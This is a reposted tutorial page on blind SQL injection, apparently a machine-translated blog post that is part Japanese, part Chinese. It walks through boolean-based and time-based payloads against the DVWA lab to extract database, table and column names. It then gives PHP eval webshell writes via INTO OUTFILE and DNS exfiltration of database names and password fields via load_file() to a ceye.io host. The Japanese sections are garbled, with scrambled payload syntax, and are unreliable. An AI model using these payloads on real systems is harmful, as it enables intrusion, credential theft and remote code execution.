SQLインジェクション(ブラインド)

その他 2019-08-18 04:12:12 訪問数: null

SQLインジェクション(ブラインド)、それはブラインドSQLインジェクションであり、一般的な違いは、一般的なインジェクション攻撃の注入は、ページ上の注入の文から直接結果を見ることができるということですが、ブラインド攻撃者は、一般的に表示ページ上で利用できない場合に注入された文が実行されても結果が、知っているので、平均ブラインドジェクト高よりも難しいされていません。ネットワーク上の現在の既存のSQLインジェクションの脆弱性の大半は、ブラインドSQLインジェクションです。

0x01の分類

(ブール値に基づく)Booleanbase
それだけトゥーレがファレスとあなたの情報に基づいて注入を返す意味ファレス、とブール明らかトゥーレは、前には、エラーメッセージはありません。
タイムベース(時間ベース)
に関係なく、入力値の真インタフェース戻る一つの値だけが、いずれの場合は正常に応じて処理される返します。時間の特定の機能を追加すると、Webページを見て時間差が注入された文が正しいかを判断するために戻ります

0x02の一般的に使用される機能

1 
2 
3 
4 
5 
6 
7
 
SUBSTR()SUBSTR(文字列、スタートNUM、NUM長); 
文字列に文字列、開始、初期位置であり、長さが長さです。
カウント()関数をカウントcount()関数の統計情報を記録するための機能であり、行数が一致する条件返さ
mysql.userからSELECT COUNT(*)を1 WHERE ID = 
ASCII()は、文字に対応する小数点値を返します
(長さを)文字列の長さを返し
左左()(STR、長さ )、 すなわち:(左列が遮断され、長さの傍受)

マニュアルブラインドのステップ0x03の

1注射があるか否かを判定し、注射は、文字または数字である
現在のデータベース名2.推測
推測データベーステーブル名3.
4.フィールド名推測テーブル
データ推測

0x04のブールブラインド

1.注入点の分析

1 
2 
3 
4
 
1」1又は#= 1 
。1' 1又は#2 = 
による注文後の場合は注入点は、所定の判定文を構築するために使用されてもよいです。
場合によってTE順序から1を選択し( 0,3を制限1,1、(1つの組合を選択すると、2)選択します)。

2.データベースの推測

1 
2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 
13
 
データベースの長さ:1 'と長さ(データベース( ))= 4# 
データベース名:
二分法の推測テーブル:ASCIIコードを比較することにより、文字が導出
1'(およびアスキーをSUBSTR(データベース ()、1 、1))>#97ページ戻り存在
1 '1及び

1'とASCII(SUBSTR(データベース()、1,1))>#100戻り、ページが存在しない

1「とASCII(SUBSTR(データベースを 、(1) 1))<ページ#103リターンの存在

1「とASCII(SUBSTR(データベース ()、1,1))<100#は、 返されたページが存在しない
最終的ことが判明:100の名称データベースASCIIコード値の最初の文字文字dを取得
名の完全なデータベースを推測することができ、上記の手順を繰り返しdvwa

3.テーブル名を推測します

1 
2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 
13 
14 
15 
16 
17 
18 
19 
20 
21 
22 
23 
24 
25
 
1 'と(選択数(TABLE_NAME = 1#はここTABLE_SCHEMA =データベース()INFORMATION_SCHEMA.TABLESから)) の不存在を示し

、および(選択数(TABLE_NAME 1' INFORMATION_SCHEMA.TABLESから)ここでTABLE_SCHEMA =データベース())= 2# ディスプレイ存在
テーブルの長さを推測するために長さ()関数を使用し続ける2つのテーブルがあること:
1「と長さ(SUBSTR((INFORMATION_SCHEMA.TABLES TABLE_SCHEMA =データベース()は0,1制限テーブル名の中から選択),. 1)) =#1の不在が示された
ユーザー
ゲストブックの
1 'と長さ(TABLE_SCHEMA =データベース()0,1を制限する)INFORMATION_SCHEMA.TABLES SUBSTR((TABLE_NAMEからの選択を、1))= 2#存在しないことを示した
????? 
と長さ1' (SUBSTR((INFORMATION_SCHEMA.TABLESからテーブル名を選択してここTABLE_SCHEMA =データベース()0,1を制限する)、1))= 9位存在が示す
最初のテーブル名の長さが9で説明しました。
1 'とASCII(SUBSTR(( TABLE_SCHEMA =データベース())0,1を制限INFORMATION_SCHEMA.TABLESからテーブル名を選択し,, 1))97位= の存在示す
ユーザ
U- 
99 

1'及びASCII(SUBSTR((TABLE_NAMEからINFORMATION_SCHEMAを選択TABLE_SCHEMA =データベース()を制限.tables )0,1)、1,1)<122位の存在を示した
1「とASCII(SUBSTRを(( 、TABLE_SCHEMA =データベース(INFORMATION_SCHEMA.TABLESからテーブル名を選択)0,1を制限します) 1,1))<#109の存在を示した

1 'とASCIIを(SUBSTR(( (TABLE_SCHEMA =データベースINFORMATION_SCHEMA.TABLESからテーブル名を選択)0,1を制限する)、1,1))<103位の不在を示した

1'とASCII(SUBSTR((からテーブル名を選択 TABLE_SCHEMA =データベース()0,1を制限INFORMATION_SCHEMA.TABLES)、1,1))> 103位の不在を示した
最初の文字を小文字G用テーブルの名前で説明を。
... 
2つのテーブル名のゲストブック、ユーザーを推測するために、上記の手順を繰り返します。

4.猜解表中的字段名
首先猜解表中字段的数量:

1
2
3
4
5
6
7
8
9
10
11
12
 
1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 # 显示不存在



1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 # 显示存在
说明users表有 8 个字段。
接着挨个猜解字段名长度:
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1 # 显示不存在

1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7 # 显示存在
说明users表的第一个字段为 7 个字符长度。
采用二分法,即可猜解出所有字段名。

5.猜解数据

1
 
同样采用二分法

0x05时间盲注

1.判断是否存在注入,注入是字符型还是数字型

1
2
 
1' and sleep(5) #感觉到明显延迟;
1 and sleep(5) #没有延迟;

2.猜解当前数据库名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
 
首先猜解数据名的长度
1' and if(length(database())=1,sleep(5),1) # 没有延迟

1' and if(length(database())=2,sleep(5),1) # 没有延迟

1' and if(length(database())=3,sleep(5),1) # 没有延迟

1' and if(length(database())=4,sleep(5),1) # 明显延迟

If函数 IF(expr1,expr2,expr3),如果expr1的值为true,则返回expr2的值,如果expr1的值为false,则返回expr3的值。
说明数据库名长度为 4 个字符。
接着采用二分法猜解数据库名:
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 明显延迟


1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟

1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 没有延迟
说明数据库名的第一个字符为小写字母d。

重复上述步骤,即可猜解出数据库名

3.猜解数据库中的表名

1
2
3
4
5
6
7
8
9
10
11
12
13
 
首先猜解数据库中表的数量:
1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 没有延迟

1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明显延迟
说明数据库中有两个表。
接着挨个猜解表名:
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 没有延迟



1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明显延迟
说明第一个表名的长度为 9 个字符。
采用二分法即可猜解出表名。

4.猜解表中的字段名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 
首先猜解表中字段的数量:
1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=1,sleep(5),1)# 没有延迟



1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# 明显延迟
说明users表中有 8 个字段。
接着挨个猜解字段名:
1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1,sleep(5),1) # 没有延迟



1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明显延迟
说明users表的第一个字段长度为 7 个字符。
采用二分法即可猜解出各个字段名。

5.猜解数据

1
 
同样采用二分法。

0x06导出Webshell

1
2
 
知道物理路径,且有MYSQL的ROOT权限
1' union select "<?php @eval($_GET['xxx']) ?>",2 into outfile 'C:\\phpStudy\\WWW\\123.php'#

0x07DNS注入(盲注的眼睛)

不论是bool型盲注还是时间型盲注,都需要频繁的跑请求才能够获取数据库中的值,在现代WAF的防护下,很可能导致IP被ban。我们可以结合DNSLOG完美快速的将数据取出。如遇到MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。load_file()不仅能够加载本地文件,同时也能对诸如\www.test.com这样的URL发起请求。

函数

load_file函数:加载一个文件

原理

示例

Mysql

1
2
3
4
5
 
1.
test' and if((select load_file(concat('\\\\',(select database()),'.fz0bj5.ceye.io\\abc'))),1,1)#
test' and if((select load_file(concat('\\\\',(select user()),'.fz0bj5.ceye.io\\abc'))),1,1)#
然后查看ceye,成功获取到了数据库名称
对于表段,由于load_file()一次只能传输一条数据,所以查询的时候需要使用limit来一个一个的解析。
 

1
2
3
4
5
6
7
8
 
2.查表名
test' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='mkcms' limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
3.查字段
test' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='mkcms_user' limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
4.查字段值
test' and if((select load_file(concat('\\\\',(select u_password from mkcms_user limit 0,1),'.fz0bj5.ceye.io\\abc'))),1,1)#
5.导出webshell(知道物理路径且Mysql为root权限)
 test' union select "<?php @eval($_POST['wade']); ?>" into outfile 'C:\\phpstudy\\www\\wade.php'#

おすすめ

転載: www.cnblogs.com/ihacker/p/11370169.html
おすすめ
NetBSD は AI によって生成されたコードの提出を禁止します
ランキング
C#の変数インスタンス、クレジット・カードケース
通过uniCloud白捡一个在线图库管理工具
Linuxのいくつかの基本的なコマンドに関する洞察(20ベース)
vueエントリーの基礎知識、コア知識をマスターするならこの記事で十分
食品化学クエスチョンバンク
CentOSの7制御システムは、ファイルを占めます
単一の el-form 内の el-form-item テキストの左揃えを解決する方法
ノードJSベースノート
関数にSQL Serverの文字列:
sparksql_相関分析
アーカイブ
もっと
2024-05-18(30)
2024-05-17(6)
2024-05-16(24)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(27)
2024-05-11(31)
2024-05-10(33)
2024-05-09(30)

コードワールド

© 2018 codetd.com